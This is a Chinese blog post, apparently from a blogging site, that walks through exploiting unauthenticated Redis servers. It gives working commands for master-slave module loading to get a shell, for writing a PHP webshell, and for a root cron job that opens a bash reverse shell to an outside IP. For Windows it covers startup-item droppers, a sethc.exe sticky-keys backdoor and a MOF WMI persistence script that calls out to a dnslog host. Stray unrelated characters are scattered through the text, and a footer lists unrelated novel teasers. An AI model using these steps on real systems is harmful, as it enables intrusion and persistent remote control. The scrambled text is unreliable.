redis漏洞利用

linux

未授權(quán)通常兩種方式利用:
一初橘、Redis版本在4.x、5.x上的主從getshell充岛。
二保檐、直接寫(xiě)入文件,寫(xiě)webshell崔梗、計(jì)劃任務(wù)夜只、ssh公鑰。
主從getshell

cd RedisModulesSDK/
make
cd ../
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"
image.png

寫(xiě)文件

config set dir /tmp/               //設(shè)置目錄
config set dbfilename test.php     //設(shè)置文件名
set shell "<?php phpinfo();?>"    //寫(xiě)入內(nèi)容
save
//寫(xiě)計(jì)劃任務(wù)
//Centos的定時(shí)任務(wù)文件在/var/spool/cron/
//Ubuntu定時(shí)任務(wù)文件在/var/spool/cron/crontabs/
config set dir /var/spool/cron/
config set dbfilename 'root'
set shell "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.226.130/7891 0>&1\n\n"
save
//備注:
//debian,ubuntu反彈失敗蒜魄,他們對(duì)計(jì)劃任務(wù)的格式很?chē)?yán)格扔亥,需要執(zhí)行crontab -u root /var/spool/cron/crontabs/root
//運(yùn)行權(quán)限為非root權(quán)限场躯,反彈shell也是低權(quán)限
image.png

window

思路:
直接寫(xiě)webshell(需要絕對(duì)路徑)、寫(xiě)啟動(dòng)項(xiàng)(需要目標(biāo)重啟)旅挤、寫(xiě)dll踢关、寫(xiě)mof(win2003)、寫(xiě)sethc.exe
寫(xiě)文件的腳本用的是https://github.com/r35tart/RedisWriteFile
0x01
目標(biāo)為IIS服務(wù)器
默認(rèn)路徑為C:\inetpub\wwwroot

image.png

這個(gè)站剛寫(xiě)上txt成功訪(fǎng)問(wèn)了粘茄,然后6379就關(guān)了签舞,撈的一。
0x02
寫(xiě)用戶(hù)啟動(dòng)項(xiàng)
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
寫(xiě)一個(gè)馬柒瓣,如果目標(biāo)開(kāi)放了3389用0708打藍(lán)屏等他重啟
0x03
寫(xiě)?zhàn)べN鍵
image.png

把sethc.exe替換為cmd.exe儒搭。利用,要能夠進(jìn)入遠(yuǎn)程桌面界面芙贫,如果顯示如下的話(huà)需要使用舊版的mstsc
image.png

0x04
寫(xiě)mof搂鲫,
image.png

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"ping 7ps0jk.dnslog.cn \")"; 
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

參考文章
https://xz.aliyun.com/t/8153#toc-1
https://xz.aliyun.com/t/7940#toc-6

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市磺平,隨后出現(xiàn)的幾起案子默穴,更是在濱河造成了極大的恐慌,老刑警劉巖褪秀,帶你破解...
    沈念sama閱讀 218,204評(píng)論 6 506
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異薛训,居然都是意外死亡媒吗,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,091評(píng)論 3 395
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門(mén)乙埃,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)闸英,“玉大人,你說(shuō)我怎么就攤上這事介袜「危” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 164,548評(píng)論 0 354
  • 道士緝兇錄:失蹤的賣(mài)姜人
    文/不壞的土叔 我叫張陵遇伞,是天一觀(guān)的道長(zhǎng)辙喂。 經(jīng)常有香客問(wèn)我,道長(zhǎng)鸠珠,這世上最難降的妖魔是什么巍耗? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,657評(píng)論 1 293
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮渐排,結(jié)果婚禮上炬太,老公的妹妹穿的比我還像新娘。我一直安慰自己驯耻,他們只是感情好亲族,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,689評(píng)論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來(lái)的
    文/花漫 我一把揭開(kāi)白布炒考。 她就那樣靜靜地躺著,像睡著了一般霎迫。 火紅的嫁衣襯著肌膚如雪斋枢。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 51,554評(píng)論 1 305
  • 城市分裂傳說(shuō)
    那天女气,我揣著相機(jī)與錄音杏慰,去河邊找鬼。 笑死炼鞠,一個(gè)胖子當(dāng)著我的面吹牛缘滥,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播谒主,決...
    沈念sama閱讀 40,302評(píng)論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開(kāi)眼朝扼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了霎肯?” 一聲冷哼從身側(cè)響起擎颖,我...
    開(kāi)封第一講書(shū)人閱讀 39,216評(píng)論 0 276
  • 萬(wàn)榮殺人案實(shí)錄
    序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎观游,沒(méi)想到半個(gè)月后搂捧,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,661評(píng)論 1 314
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡懂缕,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,851評(píng)論 3 336
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年允跑,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片搪柑。...
    茶點(diǎn)故事閱讀 39,977評(píng)論 1 348
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡聋丝,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出工碾,到底是詐尸還是另有隱情弱睦,我是刑警寧澤,帶...
    沈念sama閱讀 35,697評(píng)論 5 347
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布渊额,位于F島的核電站况木,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏旬迹。R本人自食惡果不足惜焦读,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,306評(píng)論 3 330
  • 男人毒藥:我在死后第九天來(lái)索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望舱权。 院中可真熱鬧矗晃,春花似錦、人聲如沸宴倍。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,898評(píng)論 0 22
  • 一樁弒父案仓技,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至俗他,卻和暖如春脖捻,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背兆衅。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,019評(píng)論 1 270
  • 情欲美人皮
    我被黑心中介騙來(lái)泰國(guó)打工地沮, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人羡亩。 一個(gè)月前我還...
    沈念sama閱讀 48,138評(píng)論 3 370
  • 代替公主和親
    正文 我出身青樓摩疑,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親畏铆。 傳聞我的和親對(duì)象是個(gè)殘疾皇子雷袋,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,927評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容